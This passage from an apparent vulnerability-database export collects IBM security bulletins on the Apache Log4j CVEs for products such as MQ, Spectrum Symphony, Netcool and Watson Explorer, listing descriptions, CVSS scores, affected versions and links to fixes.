<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM MQ | 9.2 CD \nIBM MQ | 9.1 CD \nIBM MQ | 9.2 LTS \n \n## Remediation/Fixes\n\nThis issue is resolved by APAR IT39467 \n\nThe following patches resolve CVE-2021-45046, CVE-2021-44228, CVE-2021-45105 & CVE-2021-44832\n\n**IBM MQ version 9.2 LTS**\n\n[Apply iFix 9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.2.0.4&platform=All&function=fixId&fixids=9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467&includeSupersedes=0&source=fc> \"Apply iFix 9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467\" )\n\n**IBM MQ version 9.1 CD and 9.2 CD**\n\n[Apply iFix 9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467 ](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.2.4&platform=All&function=fixId&fixids=9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467&includeSupersedes=0&source=fc> \"Apply iFix 9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467\" )\n\n## Workarounds and Mitigations\n\nThe IBM MQ Blockchain Bridge is shipped as part of IBM MQ on Linux x86-64 only, under the MQSeriesBCBridge RPM package. Based on current knowledge and analysis, no other IBM MQ components or installable packages are affected. 
\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T18:00:41", "type": "ibm", "title": "Security Bulletin: IBM MQ Blockchain bridge dependencies are vulnerable to issues in Apache Log4j (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T18:00:41", "id": "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "href": "https://www.ibm.com/support/pages/node/6538896", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:49", "description": "## Summary\n\nA vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. 
This vulnerability may affect IBM Spectrum Scale Container Native Storage Access and IBM Spectrum Protect Plus, which are part of the IBM Spectrum Fusion appliance.

### Vulnerability Details

Refer to the security bulletin(s) listed in the Remediation/Fixes section.

### Affected Products and Versions

| Affected Product(s) | Version(s) |
|---|---|
| IBM Spectrum Fusion HCI | 2.1 |
| IBM Spectrum Scale Container Native Storage Access (CNSA) | 5.1.1.3 |
| IBM Spectrum Protect Plus | 10.1.8.1 |

The IBM Spectrum Fusion HCI 2.1 appliance includes IBM Spectrum Scale Container Native Storage Access (CNSA) 5.1.1.3 and IBM Spectrum Protect Plus 10.1.8.1, which are impacted by Apache Log4j CVE-2021-44228.

* IBM Spectrum Scale CNSA lists a range of versions ("Customers running IBM Spectrum Scale CNSA V5.1.1.1 through V5.1.2.1"), but only version 5.1.1.3 is supported by IBM Spectrum Fusion HCI 2.1.
* IBM Spectrum Protect Plus lists a range of versions ("10.1.0.0 - 10.1.9.0"), but only version 10.1.8.1 is supported by IBM Spectrum Fusion HCI 2.1.

Refer to the security bulletin links under the Workarounds and Mitigations section.

Note: The IBM Spectrum Fusion HCI 2.1 management GUI is not impacted by CVE-2021-44228.

### Remediation/Fixes

Refer to the instructions in the Workarounds and Mitigations section.

**UPDATE 16 January 2022**

The fix for vulnerability CVE-2021-44228 is in IBM Spectrum Fusion HCI version 2.1.2. See the following page for upgrade instructions: <https://www.ibm.com/support/pages/node/6488389>

Upgrading to IBM Spectrum Fusion HCI version 2.1.2 will automatically pick up and upgrade the embedded components IBM Spectrum Scale and IBM Spectrum Protect Plus to remediate the Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45105, and CVE-2021-45046) in those components.

**If you upgrade to IBM Spectrum Fusion HCI v2.1.2, then you do not need to follow the workarounds specified in the Workarounds and Mitigations section below.**

If you have already followed the workarounds below for CVE-2021-44228, you will still need to upgrade to IBM Spectrum Fusion v2.1.2 to remediate CVE-2021-45105 and CVE-2021-45046.

### Workarounds and Mitigations

(Update 16 January 2022: see "Update" in the Remediation/Fixes section above for new instructions.)

**IBM strongly recommends addressing the vulnerability now by executing these steps:**

* Refer to the following security bulletin for remediation and additional vulnerability details for IBM Spectrum Scale Container Native Storage Access (CNSA) 5.1.1.3: <https://www.ibm.com/support/pages/node/6526202>. IBM Spectrum Scale CNSA lists a range of versions ("Customers running IBM Spectrum Scale CNSA V5.1.1.1 through V5.1.2.1"), but only version 5.1.1.3 is supported by IBM Spectrum Fusion HCI 2.1.
* Refer to the following security bulletin for remediation and additional vulnerability details for IBM Spectrum Protect Plus 10.1.8.1: <https://www.ibm.com/support/pages/node/6527828>. IBM Spectrum Protect Plus lists a range of versions ("10.1.0.0 - 10.1.9.0"), but only version 10.1.8.1 is supported by IBM Spectrum Fusion HCI 2.1.

Source: [Security Bulletin: Vulnerability in Apache Log4j (CVE-2021-44228) affects IBM Spectrum Fusion HCI which includes IBM Spectrum Scale Container Native Storage Access and IBM Spectrum Protect Plus](https://www.ibm.com/support/pages/node/6529312), IBM, published 2022-01-17. CVEs: CVE-2021-44228, CVE-2021-45046, CVE-2021-45105. Index metadata attached to this and to every bulletin record below: CVSS v3.1 base score 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) and CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C); these match the NVD scores of CVE-2021-44228, not the per-CVE scores given inside each bulletin.

---

## Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Symphony is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)

Source: <https://www.ibm.com/support/pages/node/6539410>, IBM, published 2022-01-19. CVEs: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105.

### Summary

Apache Log4j is used by IBM Spectrum Symphony for generating logs in some of its components, such as ELK and the GUI. This bulletin provides interim fixes, which include Apache Log4j 2.17.1, to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Symphony.

### Vulnerability Details

**CVEID:** [CVE-2021-45105](https://vulners.com/cve/CVE-2021-45105)
**DESCRIPTION:** Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215647> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-45046](https://vulners.com/cve/CVE-2021-45046)
**DESCRIPTION:** Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information, achieve remote code execution in some environments, and achieve local code execution in all environments.
CVSS Base score: 9
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215195> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

**CVEID:** [CVE-2021-44832](https://vulners.com/cve/CVE-2021-44832)
**DESCRIPTION:** Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code.
CVSS Base score: 6.6
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)

### Affected Products and Versions

| Affected Product(s) | Version(s) |
|---|---|
| IBM Spectrum Symphony | 7.2, 7.2.0.2 |
| IBM Spectrum Symphony | 7.2.1, 7.2.1.1 |
| IBM Spectrum Symphony | 7.3 |
| IBM Spectrum Symphony | 7.3.1 |
| IBM Spectrum Symphony | 7.3.2 |

### Remediation/Fixes

**IBM strongly recommends addressing the vulnerabilities now by upgrading to the following interim fixes in the table:**

| Products | VRMF | APAR | Remediation/First Fix |
|---|---|---|---|
| IBM Spectrum Symphony | 7.2/7.2.0.2 | P104544, P104504, P104509, P104522, P104521 | [sym-7.2-build600980](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2-build600980&includeSupersedes=0), [sym-7.2.0.2-build600934](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600934&includeSupersedes=0), [sym-7.2.0.2-build600939](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600939&includeSupersedes=0), [sym-7.2.0.2-build600941](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600941&includeSupersedes=0), [sym-7.2.0.2-build600944](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600944&includeSupersedes=0) |
| IBM Spectrum Symphony | 7.2.1/7.2.1.1 | P104505, P104510, P104524, P104523 | [sym-7.2.1-build600935](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600935&includeSupersedes=0), [sym-7.2.1-build600940](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600940&includeSupersedes=0), [sym-7.2.1-build600942](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600942&includeSupersedes=0), [sym-7.2.1-build600945](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600945&includeSupersedes=0) |
| IBM Spectrum Symphony | 7.3 | P104506, P104508 | [sym-7.3-build600936](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600936&includeSupersedes=0), [sym-7.3-build600943](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600943&includeSupersedes=0) |
| IBM Spectrum Symphony | 7.3.1 | P104507 | [sym-7.3.1-build600937](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build600937&includeSupersedes=0) |
| IBM Spectrum Symphony | 7.3.2 | P104511 | [sym-7.3.2-build600938](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build600938&includeSupersedes=0) |

### Workarounds and Mitigations

As detailed above in the Remediation/Fixes section.

---

## Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)

Source: <https://www.ibm.com/support/pages/node/6549838>, IBM, published 2022-01-21. CVEs: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105.

### Summary

Apache Log4j is used by IBM Netcool Agile Service Manager as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.

### Vulnerability Details

CVE-2021-44832 (CVSS base score 6.6), CVE-2021-45105 (7.5) and CVE-2021-45046 (9): IBM's descriptions, CVSS vectors and X-Force links are identical to those in the IBM Spectrum Symphony bulletin above.

### Affected Products and Versions

| Affected Product(s) | Version(s) |
|---|---|
| IBM Netcool Agile Service Manager | 1.1 - 1.1.10 |

### Remediation/Fixes

**IBM strongly recommends addressing the vulnerability now.**

For IBM Netcool Agile Service Manager v1.1 - v1.1.9, upgrade to v1.1.10. For v1.1.10, refresh to the packages that were uploaded on 14 January 2022.

Go to [Download IBM Netcool Agile Service Manager V1.1.10 on premise](https://www.ibm.com/support/pages/node/589201).

### Workarounds and Mitigations

None

---

## Security Bulletin: IBM Engineering Systems Design Rhapsody (Rhapsody) is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046) and denial of service due to Apache Log4j (CVE-2021-45105)

Source: <https://www.ibm.com/support/pages/node/6540566>, IBM, published 2022-05-27. CVEs: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105.

### Summary

There are remote attack vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832), which is used for logging by the IBM Engineering Systems Design Rhapsody (RDM) components Knowledge Center and Test Conductor. The fix includes an upgrade to Apache Log4j v2.17.1.

### Vulnerability Details

CVE-2021-45105 (CVSS base score 7.5), CVE-2021-45046 (9) and CVE-2021-44832 (6.6): IBM's descriptions, CVSS vectors and X-Force links are identical to those in the IBM Spectrum Symphony bulletin above.

### Affected Products and Versions

| Affected Product(s) | Version(s) |
|---|---|
| IBM Engineering Systems Design Rhapsody | 9.0, 9.0.1 |
| Rational Rhapsody | 8.4 |

### Remediation/Fixes

**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**

For IBM Engineering Systems Design Rhapsody, follow the instructions to apply the following fixes:

1. The Knowledge Center component for a locally installed help server (KCCI) that is (optionally) installed and configured for IBM Engineering Systems Design Rhapsody versions 8.4, 9.0 and 9.0.1. Select the appropriate version link below and follow the instructions from the support page.
   * [8.4](https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http)
   * [9.0](https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http)
   * [9.0.1](https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http)
2. Next, for IBM Engineering Systems Design Rhapsody versions 9.0 and 9.0.1 you will also need to update the Test Conductor component. Click the link below for the affected version and follow the instructions from the support page.
   * [9.0](https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Rhapsody-9.0-TestConductorAdapterForETM-log4j-patch&includeRequisites=1&includeSupersedes=0&downloadMethod=http)
   * [9.0.1](https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Rhapsody-9.0.1-TestConductorAdapterForETM-log4j-patch&includeRequisites=1&includeSupersedes=0&downloadMethod=http)

### Workarounds and Mitigations

None

---

## Security Bulletin: Netcool Operations Insight is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-45046, CVE-2021-45105)

Source: <https://www.ibm.com/support/pages/node/6554808>, IBM, published 2022-02-09. CVEs: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105.

### Summary

Multiple vulnerabilities were identified within the Apache Log4j library (CVE-2021-45046, CVE-2021-45105) that is used by Netcool Operations Insight to provide logging functionality.

### Vulnerability Details

CVE-2021-45105 (CVSS base score 7.5) and CVE-2021-45046 (9): IBM's descriptions, CVSS vectors and X-Force links are identical to those in the IBM Spectrum Symphony bulletin above.

### Affected Products and Versions

| Affected Product(s) | Version(s) |
|---|---|
| Netcool Operations Insight | 1.4 |
| Netcool Operations Insight | 1.5 |
| Netcool Operations Insight | 1.6 |

### Remediation/Fixes

**IBM strongly recommends addressing the vulnerabilities now.**

Please take careful inventory of components downloaded at any time and be sure to apply the remediations for any component that may have been installed, whether or not it is currently in use. To address the recent Apache Log4j vulnerabilities, **all** installed components must be upgraded.

**Red Hat OpenShift Platform**

If you are on a version between 1.4 and 1.6.2, move to IBM Netcool Operations Insight V1.6.3 on Red Hat OpenShift: <https://www.ibm.com/support/knowledgecenter/en/SSTPTP_1.6.3/com.ibm.netcool_ops.doc/soc/integration/task/soc_int_upgrade_cloud.html>

Install the recommended fix v1.6.3.2 as per <https://www.ibm.com/support/pages/node/6527810>. The fix includes Apache Log4j 2.17.1.

**Traditional On Premise**

| On Premise Component Product | IBM Netcool Operations Insight Version(s) | Remediation Steps |
|---|---|---|
| IBM Netcool Agile Service Manager | 1.4-1.6 | See [Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)](https://www.ibm.com/support/pages/node/6549838). This includes Apache Log4j 2.17.1. |
| IBM Cognos Analytics | 1.6 | See the steps for Bundled Customers in the Remediation section of [Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](https://www.ibm.com/support/pages/node/6538720). This includes Apache Log4j 2.17.1. |
| IBM Db2 | 1.4-1.6 | See [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM® Db2® (CVE-2021-45046, CVE-2021-45105)](https://www.ibm.com/support/pages/node/6528672). This includes Apache Log4j 2.17.0. |
| IBM Jazz for Service Management | 1.4-1.6 | See [Security Bulletin: IBM Jazz for Service Management is vulnerable to Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-45046)](https://www.ibm.com/support/pages/node/6536710); this includes Apache Log4j 2.17.0. A further update is available: see [Security Bulletin: IBM Jazz for Service Management is vulnerable to an Apache Log4j vulnerability (CVE-2021-44832)](https://www.ibm.com/support/pages/node/6539412); this includes Apache Log4j 2.17.1. |
| IBM Tivoli Netcool Impact | 1.4-1.6 | See [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact (CVE-2021-45105, CVE-2021-45046)](https://www.ibm.com/support/pages/node/6538694); this includes Apache Log4j 2.17.0. A further update is available: see [Security Bulletin: A vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44832)](https://www.ibm.com/support/pages/node/6538696); this includes Apache Log4j 2.17.1. |
| IBM Netcool/OMNIbus | 1.4-1.6 | See [Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)](https://www.ibm.com/support/pages/node/6552546). This includes Apache Log4j 2.17.1. |
| IBM Tivoli Netcool/OMNIbus Probes and Gateways | 1.4-1.6 | See [Netcool/OMNIbus Integrations Release Notice - Transport Module Common Integration Library](https://www.ibm.com/support/pages/node/256461?myns=swgtiv&mynp=OCSSSHTQ&mync=E&cm_sp=swgtiv-_-OCSSSHTQ-_-E) and [Netcool/OMNIbus Integrations Release Notice - Java Netcool Utility Library](https://www.ibm.com/support/pages/node/255019?myns=swgtiv&mynp=OCSSSHTQ&mync=E&cm_sp=swgtiv-_-OCSSSHTQ-_-E). These include Apache Log4j 2.17.1. |
| IBM Tivoli Netcool/OMNIbus Web GUI | 1.4-1.6 | See [Security Bulletin: IBM Tivoli Netcool/OMNIbus Web GUI is vulnerable to multiple Apache Log4j vulnerabilities (CVE-2021-45046, CVE-2021-45105)](https://www.ibm.com/support/pages/node/6537564). This includes Apache Log4j 2.17.1. |
| IBM Network Performance Insight | 1.6.0-1.6.2 | There is an interim fix available on Fix Central: [1.3.1.0-TIV-NPI-IF0005](https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.3.1.0-TIV-NPI-IF0005&source=SAR&function=fixId&parent=ibm/Tivoli). This includes Apache Log4j 2.17.0. |
| IBM Operations Analytics - Log Analysis | 1.4-1.6 | See [Security Bulletin: Log4j remote code execution vulnerability in Apache Solr and Logstash shipped with IBM Operations Analytics - Log Analysis (CVE-2021-44228)](https://www.ibm.com/support/pages/node/6527250). If Apache Log4j CVE-2021-44228 has already been addressed by executing the steps documented in that bulletin, they do not have to be duplicated. This includes Apache Log4j 2.17.0. |
| IBM Operations Analytics - Predictive Insights | 1.4-1.6 | See [Security Bulletin: A vulnerability in Apache log4j (CVE-2021-45105) affects IBM Operations Analytics Predictive Insights](https://www.ibm.com/support/pages/node/6541268). This includes Apache Log4j 2.17.1. |
| IBM Tivoli Business Service Manager (TBSM) | 1.4-1.6 | For IBM Tivoli Netcool Impact: see [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact (CVE-2021-45105, CVE-2021-45046)](https://www.ibm.com/support/pages/node/6538694) (includes Apache Log4j 2.17.0); a further update is available, see [Security Bulletin: A vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44832)](https://www.ibm.com/support/pages/node/6538696) (includes Apache Log4j 2.17.1). For WebSphere Application Server: see [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](https://www.ibm.com/support/pages/node/6538148); this removes Apache Log4j from IBM WebSphere Application Server. If Apache Log4j CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 have already been addressed by executing the steps documented in the bulletins above relating to those components, they do not have to be duplicated. |
| IBM Tivoli Netcool Configuration Manager | 1.4-1.6 | For WebSphere Application Server: see [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](https://www.ibm.com/support/pages/node/6538148); this removes Apache Log4j from IBM WebSphere Application Server. If Apache Log4j CVE-2021-45105 and CVE-2021-44832 have already been addressed by executing the steps documented in that bulletin, they do not have to be duplicated. |
| IBM Tivoli Network Manager IP Edition | 1.4-1.6 | See [Interim Fix 4.2.0.14-TIV-ITNMIP-LinuxAll-IF1](http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FTivoli+Network+Manager+IP+Edition&fixids=4.2.0.14-TIV-ITNMIP-LinuxAll-IF1&source=SAR) and follow the instructions in the ReadMe to remediate. This includes Apache Log4j 2.17.1. |
| IBM WebSphere Application Server | 1.4-1.6 | See [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](https://www.ibm.com/support/pages/node/6538148). This removes Apache Log4j from IBM WebSphere Application Server. |

### Workarounds and Mitigations

**Red Hat OpenShift Platform**: None.

**Traditional On Premise**: None, except as described in the individual on-premise component security bulletins in the Remediation/Fixes table above.

---

## IBM Watson Explorer: Apache Log4j CVE-2021-44832, CVE-2021-45105 and CVE-2021-45046

### Summary

Apache Log4j is used by IBM Watson Explorer to log system events for diagnostics. This bulletin provides a remediation for the security vulnerabilities (CVE-2021-44832, CVE-2021-45105, and CVE-2021-45046) by upgrading IBM Watson Explorer to Apache Log4j v2.17.1.

### Vulnerability Details

**CVEID:** [CVE-2021-44832](https://vulners.com/cve/CVE-2021-44832)
**DESCRIPTION:** Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code.
CVSS Base score: 6.6
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2021-45105](https://vulners.com/cve/CVE-2021-45105)
**DESCRIPTION:** Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215647> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-45046](https://vulners.com/cve/CVE-2021-45046)
**DESCRIPTION:** Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations.
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| \n\n12.0.0.0, 12.0.0.1\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3 \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2 \n \n\n\n## Remediation/Fixes\n\n**Affected Products**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8\n\n| Upgrade to Version 12.0.3.9. \n\nSee [Watson Explorer Version 12.0.3.9 Foundational Components](<https://www.ibm.com/support/pages/node/6539806>) for download information and instructions. 
